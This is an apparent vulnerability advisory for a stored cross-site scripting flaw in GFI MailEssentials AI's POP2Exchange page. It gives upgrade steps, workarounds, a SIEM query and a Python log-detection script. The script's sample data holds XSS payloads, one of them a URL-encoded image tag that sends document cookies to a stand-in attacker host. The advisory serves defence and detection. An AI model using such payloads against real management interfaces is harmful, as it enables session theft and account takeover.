CVE-2026-23610
📋 TL;DR
GFI MailEssentials AI versions before 22.4 contain a stored cross-site scripting vulnerability in the POP2Exchange configuration endpoint. An authenticated user can inject malicious scripts into the POP3 server login field, which are stored and executed when viewed in the management interface, potentially compromising other authenticated users' sessions. This affects organizations using vulnerable versions of GFI MailEssentials AI.
💻 Affected Systems
- GFI MailEssentials AI
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
An authenticated malicious insider could store a script that runs in every administrator's browser that later opens the POP2Exchange page: stealing session tokens, hijacking sessions, or performing administrative actions with the victim's privileges.
Likely Case
An authenticated user with configuration access could inject scripts that steal session cookies or perform limited actions within the management interface, potentially escalating privileges or accessing sensitive data.
If Mitigated
With proper input validation and output encoding, the malicious payload would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires authenticated access to the management interface and knowledge of the vulnerable endpoint.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 22.4 or later
Vendor Advisory: https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases
Restart Required: Yes
Instructions:
1. Download GFI MailEssentials AI version 22.4 or later from the official vendor site.
2. Back up the current configuration.
3. Run the installer to upgrade.
4. Restart the GFI MailEssentials AI service.
5. Verify the update completed successfully (Help > About should report 22.4 or later).
🔧 Temporary Workarounds
Input Validation Filter
Implement web application firewall rules or input validation to block HTML/JavaScript in the POP3 server login field. Apply the rule to the decoded request body, since URL- or entity-encoded payloads bypass a literal `<script>` match.
Access Restriction
Restrict access to the /MailEssentials/pages/MailSecurity/POP2Exchange.aspx endpoint to only the administrative users who need it.
🧯 If You Can't Patch
- Implement strict input validation for the POP3 server login field at a reverse proxy or WAF in front of the management interface; the application's own output encoding is vendor code and is only corrected by the patch.
- Monitor and audit access to the POP2Exchange configuration endpoint for suspicious activity.
🔍 How to Verify
Check if Vulnerable:
Check the GFI MailEssentials AI version in the management interface under Help > About. If version is below 22.4, the system is vulnerable.
Check Version:
Not applicable - check version through the web interface.
Verify Fix Applied:
After updating to version 22.4 or later, enter a harmless test string containing HTML (for example a bare `<b>` tag) into the POP3 server login field of a test entry, reload the page, and verify it is displayed as plain text rather than rendered. Remove the test entry afterwards.
📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save with HTML/JavaScript in parameters
- Multiple failed login attempts followed by configuration changes
Network Indicators:
- HTTP POST requests containing script tags or JavaScript functions in the popServers JSON payload
SIEM Query:
source="web_server" AND (url="/MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save" AND (request_body CONTAINS "<script>" OR request_body CONTAINS "javascript:"))
Note: matching only the literal strings "<script>" and "javascript:" misses event-handler payloads (e.g. `onerror=`) and URL- or entity-encoded variants. Run the match against the decoded request body and extend the pattern list accordingly.
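The detection logic above, and the input-validation filter from the workarounds section, both reduce to one check: does a POST to the Save endpoint carry script markers in the popServers payload after decoding? The following is an added example written for this page, not code from GFI or from the advisory. The endpoint path and the popServers parameter name come from the text above; the log record shape (one JSON object per line with method, url, user and body), the entry fields host, login and port, and the sample log lines are constructed assumptions for the demonstration.

```python
import html
import json
import re
from urllib.parse import unquote_plus

# Endpoint path and payload parameter name as given in the advisory text.
SAVE_ENDPOINT = "/MailEssentials/pages/MailSecurity/POP2Exchange.aspx/Save"
PAYLOAD_FIELD = "popServers"

# Script markers. A literal "<script>" check misses event handlers,
# javascript: URIs and encoded variants, so inputs are normalised first
# and matched against a broader set.
SCRIPT_MARKERS = [
    re.compile(r"<\s*/?\s*script\b", re.I),
    re.compile(r"<\s*(img|svg|iframe|object|embed|body)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),      # onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),
]


def normalize(value: str) -> str:
    """Undo the encodings typically used to slip past keyword filters."""
    for _ in range(2):                 # handles double URL-encoding
        value = unquote_plus(value)
    return html.unescape(value)        # &lt;script&gt; -> <script>


def suspicious_strings(obj, path=""):
    """Walk a decoded JSON payload and yield (json_path, raw_value) for every
    string leaf that contains a script marker after normalisation."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from suspicious_strings(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from suspicious_strings(val, f"{path}[{idx}]")
    elif isinstance(obj, str):
        norm = normalize(obj)
        if any(p.search(norm) for p in SCRIPT_MARKERS):
            yield path, obj


def analyze_log(lines):
    """Return one alert per POST to the Save endpoint whose body contains a
    script marker. Each line is a JSON record (constructed shape for this
    example) with keys: method, url, user, body."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST" or rec.get("url") != SAVE_ENDPOINT:
            continue
        body = rec.get("body", "")
        try:
            payload = json.loads(body)      # body is the popServers JSON payload
        except json.JSONDecodeError:
            payload = body                  # fall back to scanning the raw body
        for field, value in suspicious_strings(payload):
            alerts.append({"user": rec.get("user"), "field": field, "value": value})
    return alerts


def _rec(method, url, user, payload=None):
    """Build one constructed log record; the body is the JSON-encoded payload."""
    body = json.dumps(payload) if payload is not None else ""
    return json.dumps({"method": method, "url": url, "user": user, "body": body})


# Constructed sample log: a page view, a benign save, a naive <script> payload,
# and a URL-encoded <img onerror=...> payload that a literal "<script>" match misses.
SAMPLE_LOG = "\n".join([
    _rec("GET", "/MailEssentials/pages/MailSecurity/POP2Exchange.aspx", "admin"),
    _rec("POST", SAVE_ENDPOINT, "admin",
         {PAYLOAD_FIELD: [{"host": "pop.example.com", "login": "mailbox@example.com", "port": 110}]}),
    _rec("POST", SAVE_ENDPOINT, "helpdesk",
         {PAYLOAD_FIELD: [{"host": "pop.example.com",
                           "login": "<script>alert(document.cookie)</script>", "port": 110}]}),
    _rec("POST", SAVE_ENDPOINT, "helpdesk",
         {PAYLOAD_FIELD: [{"host": "pop.example.com",
                           "login": "%3Cimg%20src%3Dx%20onerror%3Dfetch('//attacker.test/'%2Bdocument.cookie)%3E",
                           "port": 110}]}),
])

if __name__ == "__main__":
    for alert in analyze_log(SAMPLE_LOG.splitlines()):
        print(alert)
```

Point the same function at a WAF or reverse-proxy request hook to implement the workaround filter: reject the request when `suspicious_strings` yields anything, instead of raising an alert. Tune `SCRIPT_MARKERS` against your own traffic before blocking, since a broad `on[a-z]+=` pattern can match legitimate text in other fields.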